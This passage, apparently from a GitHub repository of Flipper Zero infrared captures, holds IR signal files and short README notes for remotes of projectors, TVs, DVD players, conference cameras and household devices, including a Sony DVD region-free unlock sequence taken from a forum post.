type: raw 18 | frequency: 38000 19 | duty_cycle: 0.330000 20 | data: 2915 1094 1091 1037 1064 1068 1991 1078 1065 1061 1065 1062 1064 1070 1989 1086 1964 21 | # 22 | name: Right 23 | type: raw 24 | frequency: 38000 25 | duty_cycle: 0.330000 26 | data: 2911 1103 1989 1087 1988 1079 1063 1063 1063 1063 1063 1061 1065 1071 1988 1088 1962 27 | # 28 | name: Forward 29 | type: raw 30 | frequency: 38000 31 | duty_cycle: 0.330000 32 | data: 2911 1095 1039 1094 1990 1086 1989 1079 1039 1087 1039 1088 1038 1096 1988 1086 1964 33 | # 34 | name: Back 35 | type: raw 36 | frequency: 38000 37 | duty_cycle: 0.330000 38 | data: 2912 1105 1987 1079 1063 1070 1990 1079 1063 1061 1065 1062 1064 1071 1989 1088 1962 39 | # 40 | name: Fast_walk 41 | type: raw 42 | frequency: 38000 43 | duty_cycle: 0.330000 44 | data: 2914 1096 1038 1096 1988 1078 1040 1086 1040 1086 1040 1087 1039 1095 1989 1086 1964 45 | # 46 | name: Feed_follow 47 | type: raw 48 | frequency: 38000 49 | duty_cycle: 0.330000 50 | data: 2914 1103 1988 1078 1040 1087 1039 1085 1041 1086 1040 1086 1040 1095 1989 1087 1963 12950 78 21543 124 24887 75 51 | -------------------------------------------------------------------------------- /infrared/Infocus_hw_nagivator_3/Infocus_hw_navig_3.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: NECext 7 | address: 87 4E 00 00 8 | command: 17 E8 00 00 9 | # 10 | name: Help 11 | type: parsed 12 | protocol: NECext 13 | address: 87 4E 00 00 14 | command: 0A F5 00 00 15 | # 16 | name: Menu 17 | type: parsed 18 | protocol: NECext 19 | address: 87 4E 00 00 20 | command: 02 FD 00 00 21 | # 22 | name: Up 23 | type: parsed 24 | protocol: NECext 25 | address: 87 4E 00 00 26 | command: 13 EC 00 00 27 | # 28 | name: Left 29 | type: parsed 30 | protocol: NECext 31 | address: 87 4E 00 00 32 | command: 11 EE 00 00 33 | # 34 | name: Right 35 | type: parsed 36 | protocol: NECext 37 | address: 87 4E 00 00 38 | command: 12 ED 00 00 39 | # 40 | name: Down 41 | type: parsed 42 | protocol: NECext 43 | address: 87 4E 00 00 44 | command: 14 EB 00 00 45 | # 46 | name: Select 47 | type: parsed 48 | protocol: NECext 49 | address: 87 4E 00 00 50 | command: 32 CD 00 00 51 | # 52 | name: Vol+ 53 | type: parsed 54 | protocol: NECext 55 | address: 87 4E 00 00 56 | command: 08 F7 00 00 57 | # 58 | name: Vol- 59 | type: parsed 60 | protocol: NECext 61 | address: 87 4E 00 00 62 | command: 04 FB 00 00 63 | # 64 | name: Custom 65 | type: parsed 66 | protocol: NECext 67 | address: 87 4E 00 00 68 | command: 2B D4 00 00 69 | # 70 | name: Source 71 | type: parsed 72 | protocol: NECext 73 | address: 87 4E 00 00 74 | command: 10 EF 00 00 75 | # 76 | name: Blank 77 | type: parsed 78 | protocol: NECext 79 | address: 87 4E 00 00 80 | command: 31 CE 00 00 81 | # 82 | name: Presets 83 | type: parsed 84 | protocol: NECext 85 | address: 87 4E 00 00 86 | command: 2C D3 00 00 87 | # 88 | name: Mute 89 | type: parsed 90 | protocol: NECext 91 | address: 87 4E 00 00 92 | command: 29 D6 00 00 93 | # 94 | name: Auto_image 95 | type: parsed 96 | protocol: NECext 97 | address: 87 4E 00 00 98 | command: 33 CC 00 00 99 | # 100 | name: Resize 101 | type: parsed 102 | protocol: NECext 103 | address: 87 4E 00 00 104 | command: 34 CB 00 00 105 | -------------------------------------------------------------------------------- /infrared/Infocus_hw_nagivator_3/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of an InFocus HW-Navigator-3 remote. Tested on an InFocus IN3116 2 | -------------------------------------------------------------------------------- /infrared/JVC VCR TV 076N0ES010/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a JVC VCR/TV remote with markings 076N0ES010 on it. 2 | 3 | These are captured RAW 4 | 5 | Untested 6 | -------------------------------------------------------------------------------- /infrared/JVC VCR TV LP21138-001/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a JVC VCR/TV remote with model LP21138-001 written on it. 2 | 3 | This was captured RAW 4 | 5 | Untested 6 | -------------------------------------------------------------------------------- /infrared/Jinhoo Remote/Jinhoo.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Jinhoo_on_off 5 | type: parsed 6 | protocol: NEC 7 | address: 01 00 00 00 8 | command: 00 00 00 00 9 | # 10 | name: Menu_exit 11 | type: parsed 12 | protocol: NEC 13 | address: 01 00 00 00 14 | command: 01 00 00 00 15 | # 16 | name: Ok 17 | type: parsed 18 | protocol: NEC 19 | address: 01 00 00 00 20 | command: 06 00 00 00 21 | # 22 | name: Mute 23 | type: parsed 24 | protocol: NEC 25 | address: 01 00 00 00 26 | command: 44 00 00 00 27 | # 28 | name: Back 29 | type: parsed 30 | protocol: NEC 31 | address: 01 00 00 00 32 | command: 0B 00 00 00 33 | # 34 | name: Source 35 | type: parsed 36 | protocol: NEC 37 | address: 01 00 00 00 38 | command: 09 00 00 00 39 | # 40 | name: Play_pause 41 | type: parsed 42 | protocol: NEC 43 | address: 01 00 00 00 44 | command: 03 00 00 00 45 | # 46 | name: Vol_up 47 | type: parsed 48 | protocol: NEC 49 | address: 01 00 00 00 50 | command: 48 00 00 00 51 | # 52 | name: Vol_down 53 | type: parsed 54 | protocol: NEC 55 | address: 01 00 00 00 56 | command: 40 00 00 00 57 | # 58 | name: Arw_up 59 | type: parsed 60 | protocol: NEC 61 | address: 01 00 00 00 62 | command: 05 00 00 00 63 | # 64 | name: Arw_left 65 | type: parsed 66 | protocol: NEC 67 | address: 01 00 00 00 68 | command: 02 00 00 00 69 | # 70 | name: Arw_right 71 | type: parsed 72 | protocol: NEC 73 | address: 01 00 00 00 74 | command: 0A 00 00 00 75 | # 76 | name: Arw_down 77 | type: parsed 78 | protocol: NEC 79 | address: 01 00 00 00 80 | command: 04 00 00 00 81 | -------------------------------------------------------------------------------- /infrared/Jinhoo Remote/README.md: -------------------------------------------------------------------------------- 1 | This is a complete capture of the generic remote included with a Jinhoo projector. 2 | 3 | The Flipper detects the protocol as NEC. 4 | 5 | Tested on a Jinhoo M10 Projector 6 | -------------------------------------------------------------------------------- /infrared/LG AKB73275675/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of an LG AKB73275675 remote 2 | -------------------------------------------------------------------------------- /infrared/LG_75UJ6470/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of the remote to an LG 75UJ6470. All major functions tested. 2 | -------------------------------------------------------------------------------- /infrared/Logitech_RI0019_for_ptz_pro_2/README.md: -------------------------------------------------------------------------------- 1 | Capture of a Logitech RI0019 remote that came with a Logitech PTZ Pro 2 2 | -------------------------------------------------------------------------------- /infrared/Logitech_RI0019_for_ptz_pro_2/logitech_ri0019.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: No_pic 5 | type: parsed 6 | protocol: NEC 7 | address: 02 00 00 00 8 | command: F9 00 00 00 9 | # 10 | name: Rotate 11 | type: parsed 12 | protocol: NEC 13 | address: 02 00 00 00 14 | command: E8 00 00 00 15 | # 16 | name: Multi_pic 17 | type: parsed 18 | protocol: NEC 19 | address: 02 00 00 00 20 | command: FA 00 00 00 21 | # 22 | name: Up 23 | type: parsed 24 | protocol: NEC 25 | address: 02 00 00 00 26 | command: A6 00 00 00 27 | # 28 | name: Left 29 | type: parsed 30 | protocol: NEC 31 | address: 02 00 00 00 32 | command: AE 00 00 00 33 | # 34 | name: Right 35 | type: parsed 36 | protocol: NEC 37 | address: 02 00 00 00 38 | command: BE 00 00 00 39 | # 40 | name: Down 41 | type: parsed 42 | protocol: NEC 43 | address: 02 00 00 00 44 | command: B6 00 00 00 45 | # 46 | name: Zoom+ 47 | type: parsed 48 | protocol: NEC 49 | address: 02 00 00 00 50 | command: A3 00 00 00 51 | # 52 | name: Zoom- 53 | type: parsed 54 | protocol: NEC 55 | address: 02 00 00 00 56 | command: E3 00 00 00 57 | # 58 | name: Home 59 | type: parsed 60 | protocol: NEC 61 | address: 02 00 00 00 62 | command: FB 00 00 00 63 | # 64 | name: 1 65 | type: parsed 66 | protocol: NEC 67 | address: 02 00 00 00 68 | command: AC 00 00 00 69 | # 70 | name: 2 71 | type: parsed 72 | protocol: NEC 73 | address: 02 00 00 00 74 | command: 6C 00 00 00 75 | # 76 | name: 3 77 | type: parsed 78 | protocol: NEC 79 | address: 02 00 00 00 80 | command: EC 00 00 00 81 | -------------------------------------------------------------------------------- /infrared/Magnavox_DVD_NB098/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Magnavox DVD NB098 remote. 2 | 3 | Untested. 4 | -------------------------------------------------------------------------------- /infrared/Marantz_RC2100DR/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Marantz RC2100DR. I no longer have access to the original equipment this went to (I think it was a CD changer/recorder). This remote appears to be a mix of RC5, RC5X, and RAW. It also has two profiles - CD and CDR. Since I'm not sure exactly which things change with the profile, I've simply made two captures. CD does not include the record functions, as they don't do anything when the remote is set to that mode. 2 | -------------------------------------------------------------------------------- /infrared/Monster_LED_Touch_Light/README.MD: -------------------------------------------------------------------------------- 1 | Capture of the remote for the Monster LED Touch Light modules. I gave up trying to be descriptive of the colors on the remote, so feel free to rename them as you want. 2 | -------------------------------------------------------------------------------- /infrared/Optoma Projector/README.md: -------------------------------------------------------------------------------- 1 | Capture of an Optoma Projector remote. Unable to determine exact model of projector. Unable to test due to the projectopr being non-functional. 2 | 3 | I had difficulty getting reads of the source buttons, so be aware. 4 | 5 | I also found some hidden buttons when I opened the remote. I have read and labeled those as unknown_1 - 7, and they are in order from top-to-bottom, left-to-right on the remote. 6 | -------------------------------------------------------------------------------- /infrared/Panasonic DVD TV/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a Panasonic DVD/TV remote. 2 | 3 | Protocol: Kaseikyo 4 | 5 | Untested 6 | -------------------------------------------------------------------------------- /infrared/Panasonic N2QAYb000210/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Panasonic N2QAYB000210 remote for a Panasonic SA-PT660 home theater system. 2 | 3 | Tested. 4 | -------------------------------------------------------------------------------- /infrared/Panasonic N2QAYb000210/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Panasonic N2QAYb000210/image.jpeg -------------------------------------------------------------------------------- /infrared/Panasonic Viera Remote/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a remote for a Panasonic Viera TV 2 | 3 | Flipper detects the protocol as Kaseikyo 4 | 5 | Tested! 6 | -------------------------------------------------------------------------------- /infrared/Panasonic_DMP-BDT210/README.md: -------------------------------------------------------------------------------- 1 | This is a re-created remote for a Panasonic DMP-BDT210, based very heavily on the DMP-BD75.ir file by sealldeveloper, here: 2 | https://github.com/logickworkshop/Flipper-IRDB/blob/acec83b9089daf4b71ec873240ead74c5ce56af5/Blu-Ray/Panasonic/Panasonic_DMP_BD75.ir 3 | 4 | Thank you, sealldeveloper 5 | 6 | (I also looked to the irplus captures for this device and not only did I not find any new features, but the layout of all of the irplus remotes for this series is misaligned) 7 | 8 | There aren't any major differences with this remote file from sealldeveloper's. This unit supports 3D, but I do not currently have any way to test this. The remote for this unit has a specific 3D button, so I don't know if this works. 9 | 10 | I've found a button that switches the resolution to 480p, so I included that. I think I previously found a 1080 button in testing, but I'm no longer able to replicate this. So further research is needed. 11 | 12 | I've also included the Skype button, although this function has been discontinued. 13 | -------------------------------------------------------------------------------- /infrared/Panasonic_EUR7621070/README.md: -------------------------------------------------------------------------------- 1 | Complete capture. Not tested. 2 | -------------------------------------------------------------------------------- /infrared/Panasonic_N2QAEC000017/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Panasonic "Video Camera" N2QAEC000017 remote. This model was used with a Panasonic MiniDV camera. 2 | -------------------------------------------------------------------------------- /infrared/Polycom Remote/README.md: -------------------------------------------------------------------------------- 1 | This is a complete capture, to the best of my abilities, of a VX series Polycom remote. 2 | I do not currently have the means to test this, as the equipment is obsolete. 3 | 4 | Note that the remote has two feet that act as buttons when the remote is placed down on a surface. 5 | 6 | This acts as an idle/active status for the Polycom unit, iirc. 7 | 8 | There is a signal that is sent when these buttons are pressed. This is "Remote_down_idle" 9 | 10 | A brief signal is sent (and I believe is sent periodically) immediately after the feet buttons are released (when the remote is picked up). 11 | This is "Remote_up" 12 | 13 | Tested successfully on a V700 unit 14 | -------------------------------------------------------------------------------- /infrared/Ptzoptics Remote/README.md: -------------------------------------------------------------------------------- 1 | This is a complete capture of a PTZ Optics remote. 2 | 3 | All four camera profiles have been captured. 4 | 5 | For those using firmware that allows them to use the IR Remote app (Apps/Tools/IR Remote), I've included some convenient remote layouts in the 'remote' directory. 6 | 7 | To use them, first place the files Ptz_cam1.ir Ptz_cam2.ir Ptz_cam3.ir Ptz_cam4.ir files on your Flipper into the folder: 8 | SD Card/infrared/ptzoptics 9 | 10 | Next, place cam1.txt cam2.txt cam3.txt and cam4.txt on your Flipper into the folder: 11 | SD Card/infrared/remote 12 | 13 | Controls included are: 14 | Up 15 | Down 16 | Left 17 | Right 18 | Reset 19 | Power 20 | -------------------------------------------------------------------------------- /infrared/Ptzoptics Remote/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Ptzoptics Remote/image.jpeg -------------------------------------------------------------------------------- /infrared/Ptzoptics Remote/remote/cam1.txt: -------------------------------------------------------------------------------- 1 | REMOTE: /ext/infrared/Ptzoptics/Ptz_cam1.ir 2 | UP: Up 3 | DOWN: Down 4 | LEFT: Left 5 | RIGHT: Right 6 | OK: Reset 7 | BACK: Back 8 | UPHOLD: Up 9 | DOWNHOLD: Down 10 | LEFTHOLD: Left 11 | RIGHTHOLD: Right 12 | OKHOLD: Power 13 | -------------------------------------------------------------------------------- /infrared/RCA_RCR314WR_RCR313BR_3_in_1_universal/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of an RCA314WR that should also work on an RCA313BR. This was captured on the TV setting on the remote. Untested. 2 | -------------------------------------------------------------------------------- /infrared/Samsung_AA59-00580A/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Samsung AA59-00580A remote. This was tested successfully on two different Samsung TVs. 2 | -------------------------------------------------------------------------------- /infrared/Samsung_AH59-025478/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Samsung AH59-025478 remote for a Samsung HW-FM45/ZA soundbar. This remote has some soundbar-specific buttons that are RAW, and some TV-specific buttons that are Samsung32 protocol 2 | 3 | Tested. 4 | -------------------------------------------------------------------------------- /infrared/Sanyo_Blu_Ray_Player_nc088/README.md: -------------------------------------------------------------------------------- 1 | Capture of a remote for a Sanyo Blu Ray Player, remote model nc088 2 | -------------------------------------------------------------------------------- /infrared/Sharp_RRMCGA664WJSA/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Sharp RRMCGA664WJSA. Untested, but I'm pretty certain this goes with a Sharp Notevision XR-32S-L 2 | -------------------------------------------------------------------------------- /infrared/Sony DVD RMT D165A/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a Sony DVD RMT D165A remote 2 | -------------------------------------------------------------------------------- /infrared/Sony RMT 814 Remote/README.md: -------------------------------------------------------------------------------- 1 | This is a complete capture of an old Sony RMT 814 remote that went to some kind of camera, not sure which. 2 | 3 | Protocol is SIRC15 4 | 5 | Untested 6 | -------------------------------------------------------------------------------- /infrared/Sony RMT 814 Remote/Sony_rmt_814.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: On_off 5 | type: parsed 6 | protocol: SIRC15 7 | address: B9 00 00 00 8 | command: 19 00 00 00 9 | # 10 | name: Photo 11 | type: parsed 12 | protocol: SIRC15 13 | address: B9 00 00 00 14 | command: 15 00 00 00 15 | # 16 | name: Display 17 | type: parsed 18 | protocol: SIRC 19 | address: 07 00 00 00 20 | command: 5A 00 00 00 21 | # 22 | name: Zero_set_memory 23 | type: parsed 24 | protocol: SIRC 25 | address: 07 00 00 00 26 | command: 47 00 00 00 27 | # 28 | name: Search_mode 29 | type: parsed 30 | protocol: SIRC15 31 | address: B9 00 00 00 32 | command: 2D 00 00 00 33 | # 34 | name: Sm_back 35 | type: parsed 36 | protocol: SIRC 37 | address: 07 00 00 00 38 | command: 57 00 00 00 39 | # 40 | name: Sm_fwd 41 | type: parsed 42 | protocol: SIRC 43 | address: 07 00 00 00 44 | command: 56 00 00 00 45 | # 46 | name: Data_code 47 | type: parsed 48 | protocol: SIRC15 49 | address: B9 00 00 00 50 | command: 4C 00 00 00 51 | # 52 | name: Rew 53 | type: parsed 54 | protocol: SIRC 55 | address: 07 00 00 00 56 | command: 1B 00 00 00 57 | # 58 | name: Play 59 | type: parsed 60 | protocol: SIRC 61 | address: 07 00 00 00 62 | command: 1A 00 00 00 63 | # 64 | name: Ff 65 | type: parsed 66 | protocol: SIRC 67 | address: 07 00 00 00 68 | command: 1C 00 00 00 69 | # 70 | name: Back 71 | type: parsed 72 | protocol: SIRC 73 | address: 07 00 00 00 74 | command: 30 00 00 00 75 | # 76 | name: Stop 77 | type: parsed 78 | protocol: SIRC 79 | address: 07 00 00 00 80 | command: 18 00 00 00 81 | # 82 | name: Forward 83 | type: parsed 84 | protocol: SIRC 85 | address: 07 00 00 00 86 | command: 31 00 00 00 87 | # 88 | name: Pause 89 | type: parsed 90 | protocol: SIRC 91 | address: 07 00 00 00 92 | command: 19 00 00 00 93 | # 94 | name: Slow 95 | type: parsed 96 | protocol: SIRC 97 | address: 07 00 00 00 98 | command: 23 00 00 00 99 | # 100 | name: X2 101 | type: parsed 102 | protocol: SIRC 103 | address: 07 00 00 00 104 | command: 14 00 00 00 105 | # 106 | name: Telephoto 107 | type: parsed 108 | protocol: SIRC15 109 | address: D9 00 00 00 110 | command: 1A 00 00 00 111 | # 112 | name: Wide 113 | type: parsed 114 | protocol: SIRC15 115 | address: D9 00 00 00 116 | command: 1B 00 00 00 117 | -------------------------------------------------------------------------------- /infrared/Sony_BDP_S5100_region_free_unlock/README.md: -------------------------------------------------------------------------------- 1 | This is a remote mapping based on captures from a programmed OneForAll remote configured as based on this forum post: https://www.videohelp.com/dvdhacks/sony-bdp-s5100/12108 2 | 3 | Note - this procedure is reported to NOT work on REGION 1 (US) players. It seems it may only work on Region 2 devices. Also, this is ONLY for the DVD player. It will NOT let you play blu-ray discs region-free. 4 | 5 | I have not been able to successfully test this. If someone finds that this works for their unit, file an Issue on Github and I'll update the Readme and give YOU CREDIT! 6 | -------------------------------------------------------------------------------- /infrared/Sony_BDP_S5100_region_free_unlock/Unlock_0533.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: 1 5 | type: parsed 6 | protocol: SIRC20 7 | address: 3A 09 00 00 8 | command: 7F 00 00 00 9 | # 10 | name: 2 11 | type: parsed 12 | protocol: SIRC20 13 | address: 3A 09 00 00 14 | command: 65 00 00 00 15 | # 16 | name: 3 17 | type: parsed 18 | protocol: SIRC20 19 | address: 3A 09 00 00 20 | command: 55 00 00 00 21 | # 22 | name: 4 23 | type: parsed 24 | protocol: SIRC20 25 | address: 3A 09 00 00 26 | command: 5F 00 00 00 27 | # 28 | name: 5 29 | type: parsed 30 | protocol: SIRC20 31 | address: 3A 09 00 00 32 | command: 15 00 00 00 33 | -------------------------------------------------------------------------------- /infrared/Sony_DVD_rmt_D185A/README.md: -------------------------------------------------------------------------------- 1 | This is essentially the same remote as the Sony DVD RMT D165A, but with the added buttons: Replay, Advance, Slow Play, Fast Play 2 | -------------------------------------------------------------------------------- /infrared/Sony_DVD_rmt_D185A/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Sony_DVD_rmt_D185A/image.jpeg -------------------------------------------------------------------------------- /infrared/Sony_RM_PJ27/README.md: -------------------------------------------------------------------------------- 1 | Capture of the remote for a Sony RM PJ27 projector remote. Untested. 2 | 3 | The remote has a four-way ID indicator switch. The currentl capture is only for ID 1. Most of the buttons share the same address, but not all. Some samples of the pwoer button are included at the end, for reverse engineering. I will get a complete capture of this in the future. 4 | -------------------------------------------------------------------------------- /infrared/Sony_RM_R52/README.md: -------------------------------------------------------------------------------- 1 | This is a full capture of both Deck A and Deck B on a Sony RM-R52. Untested, but it should work on a Sony RCD-W500C 2 | -------------------------------------------------------------------------------- /infrared/Sony_System_Audio_RM_AMU009/README.md: -------------------------------------------------------------------------------- 1 | Complete capture. Not tested. 2 | -------------------------------------------------------------------------------- /infrared/Sony_System_Audio_RM_AMU009/signal-2023-06-22-190616_002.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Sony_System_Audio_RM_AMU009/signal-2023-06-22-190616_002.jpeg -------------------------------------------------------------------------------- /infrared/Stinger_HEIGH10_UN1810_DVD_Video_System/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Stinger HEIGH10 UN1810 DVD Video System Navigation Receiver. Untested. 2 | -------------------------------------------------------------------------------- /infrared/TOPCON_PSR-2000/README.md: -------------------------------------------------------------------------------- 1 | Capture of a TOPCON PSR-2000 (MSR-2001) remote for a vision test machine. 2 | 3 | Captures are all RAW. To ensure a complete RAW capture was saved, Debux RX mode was used to establish how many samples each button sends out on average, and only saved Reads when the expected number was captured. 4 | 5 | Untested. 6 | 7 | 8 | -------------------------------------------------------------------------------- /infrared/Tandberg TRC V/README.md: -------------------------------------------------------------------------------- 1 | A mostly-comlpete capture of a Tandberg TRC V "iTV" remote. I was able to capture everything except for the Home button, which wouldn't register on the Flipper at all. Also, there appears to be a random IR emission periodically that Flipper reads 65 samples from. I've saved that as "Unknown_65" on the remote. 2 | 3 | Flipper was not able to decode anything, so they're all RAW captures. 4 | 5 | Untested. 6 | -------------------------------------------------------------------------------- /infrared/Tandberg TRC V/Tandberg_Cisco-TRC5-quick-reference-guide-.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Tandberg TRC V/Tandberg_Cisco-TRC5-quick-reference-guide-.pdf -------------------------------------------------------------------------------- /infrared/Toshiba_SE-R0108/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a Toshiba SE-R0108 remote. Several buttons have dual function. Please refer to picture to check the mapping. 2 | 3 | Not tested. 4 | -------------------------------------------------------------------------------- /infrared/Toshiba_SE-R0305/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Toshiba SE-R0305 remote. Tested successfully on a Toshiba 32CV100U 2 | -------------------------------------------------------------------------------- /infrared/Toshiba_SE-R0305/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Toshiba_SE-R0305/image.jpeg -------------------------------------------------------------------------------- /infrared/Toyota Sienna 2010 Rear Seat Entertainment/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of the DVD remote for a 2010 Toyota Sienna 2 | -------------------------------------------------------------------------------- /infrared/Tzumi_LED_colorbar/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of the remote that comes with the Tzumi LED colorbar. 2 | 3 | I had a hard time naming the colors from the remote. I'm sorry. 4 | 5 | Per the manual, Brightness Up/Down will control the brightness when the device is set to a specific color. When the device is set to Flash, Strobe, Fade, Smooth, the Brightness Up/Down will control the speed of those functions. When adjusting the brightness or the speed, the device will flash white to indicate it can no longer adjust in that direction further (i.e. when pressing bright and the device is as bright as it can go, it will flash white when you continue to press bright up) 6 | 7 | Tested fully. 8 | 9 | Also works on: 10 | 11 | -Vibe e-ssential Color Changing Light (globe-style) from Five Below 12 | -------------------------------------------------------------------------------- /infrared/Utilitech_indoor_oscillating_tower_fan/README.md: -------------------------------------------------------------------------------- 1 | Capture of the remote for a Utilitech 36-inch 3-speed indoor oscillating tower fan, model FZ10-19JR 2 | -------------------------------------------------------------------------------- /infrared/Vizio Remote/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a Vizio Remote. 2 | 3 | Protocol is NEC 4 | 5 | Tested successfully on a model E190VA 6 | -------------------------------------------------------------------------------- /infrared/Vizio_E70u-D3/README.md: -------------------------------------------------------------------------------- 1 | Capture of a remote for a Vizio E70u-D3 TV panel 2 | -------------------------------------------------------------------------------- /infrared/Vizio_E70u-D3/Vizio_E70u-D3.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: NEC 7 | address: 04 00 00 00 8 | command: 08 00 00 00 9 | # 10 | name: Source 11 | type: parsed 12 | protocol: NEC 13 | address: 04 00 00 00 14 | command: 2F 00 00 00 15 | # 16 | name: Link 17 | type: parsed 18 | protocol: NEC 19 | address: 04 00 00 00 20 | command: 63 00 00 00 21 | # 22 | name: Image 23 | type: parsed 24 | protocol: NEC 25 | address: 04 00 00 00 26 | command: 77 00 00 00 27 | # 28 | name: Vol+ 29 | type: parsed 30 | protocol: NEC 31 | address: 04 00 00 00 32 | command: 02 00 00 00 33 | # 34 | name: Vol- 35 | type: parsed 36 | protocol: NEC 37 | address: 04 00 00 00 38 | command: 03 00 00 00 39 | # 40 | name: Ch+ 41 | type: parsed 42 | protocol: NEC 43 | address: 04 00 00 00 44 | command: 00 00 00 00 45 | # 46 | name: Ch- 47 | type: parsed 48 | protocol: NEC 49 | address: 04 00 00 00 50 | command: 01 00 00 00 51 | # 52 | name: Play_pause 53 | type: parsed 54 | protocol: NEC 55 | address: 04 00 00 00 56 | command: 37 00 00 00 57 | # 58 | name: Mute 59 | type: parsed 60 | protocol: NEC 61 | address: 04 00 00 00 62 | command: 09 00 00 00 63 | # 64 | name: Pic 65 | type: parsed 66 | protocol: NEC 67 | address: 04 00 00 00 68 | command: 67 00 00 00 69 | # 70 | 71 | -------------------------------------------------------------------------------- /infrared/Vizio_M70Q6-J03/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a Vizio M70Q6-J03. Tested. 2 | -------------------------------------------------------------------------------- /infrared/Vizio_V705-G1/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of the remote to a V705-G1. Tested. 2 | -------------------------------------------------------------------------------- /infrared/Yealink_UVC86/README.md: -------------------------------------------------------------------------------- 1 | Capture of the remote for a Yealink UVC86 Camera 2 | -------------------------------------------------------------------------------- /infrared/Yealink_UVC86/Yealink_UVC86.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Mic 5 | type: parsed 6 | protocol: NECext 7 | address: 00 5B 00 00 8 | command: 0A F5 00 00 9 | # 10 | name: Cam 11 | type: parsed 12 | protocol: NECext 13 | address: 00 5B 00 00 14 | command: 0F F0 00 00 15 | # 16 | name: Up 17 | type: parsed 18 | protocol: NECext 19 | address: 00 5B 00 00 20 | command: 07 F8 00 00 21 | # 22 | name: Left 23 | type: parsed 24 | protocol: NECext 25 | address: 00 5B 00 00 26 | command: 02 FD 00 00 27 | # 28 | name: Right 29 | type: parsed 30 | protocol: NECext 31 | address: 00 5B 00 00 32 | command: 00 FF 00 00 33 | # 34 | name: Down 35 | type: parsed 36 | protocol: NECext 37 | address: 00 5B 00 00 38 | command: 05 FA 00 00 39 | # 40 | name: Ok 41 | type: parsed 42 | protocol: NECext 43 | address: 00 5B 00 00 44 | command: 01 FE 00 00 45 | # 46 | name: Scrl_up 47 | type: parsed 48 | protocol: NECext 49 | address: 00 5B 00 00 50 | command: 03 FC 00 00 51 | # 52 | name: Scrl_dn 53 | type: parsed 54 | protocol: NECext 55 | address: 00 5B 00 00 56 | command: 04 FB 00 00 57 | # 58 | name: 1 59 | type: parsed 60 | protocol: NECext 61 | address: 00 5B 00 00 62 | command: 12 ED 00 00 63 | # 64 | name: 2 65 | type: parsed 66 | protocol: NECext 67 | address: 00 5B 00 00 68 | command: 11 EE 00 00 69 | # 70 | name: 3 71 | type: parsed 72 | protocol: NECext 73 | address: 00 5B 00 00 74 | command: 10 EF 00 00 75 | # 76 | name: Vol+ 77 | type: parsed 78 | protocol: NECext 79 | address: 00 5B 00 00 80 | command: 0B F4 00 00 81 | # 82 | name: Vol- 83 | type: parsed 84 | protocol: NECext 85 | address: 00 5B 00 00 86 | command: 06 F9 00 00 87 | -------------------------------------------------------------------------------- /infrared/Zenith_SC3492Z/README.md: -------------------------------------------------------------------------------- 1 | Capture of a Zenith SC3492Z remote. I have no idea what model TV this goes to, and I am unable to test it. Each button is a 33-sample raw capture. 2 | 3 | -------------------------------------------------------------------------------- /infrared/evolution_4x1_hdmi_switch/README.md: -------------------------------------------------------------------------------- 1 | Capture of a remote to an Evolution 4x1 HDMI switcher. 2 | 3 | Several of the buttons captured as Raw rather than parsed. This may be due to a failing battery in the remote, and will need to be tested again. In the meantime, all these commands worked properly on the switch. 4 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/1533.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: 1 5 | type: parsed 6 | protocol: SIRC 7 | address: 00 00 00 00 8 | command: 7F 00 00 00 9 | # 10 | name: 2 11 | type: parsed 12 | protocol: SIRC20 13 | address: 3A 09 00 00 14 | command: 65 00 00 00 15 | # 16 | name: 3 17 | type: parsed 18 | protocol: SIRC20 19 | address: 3A 09 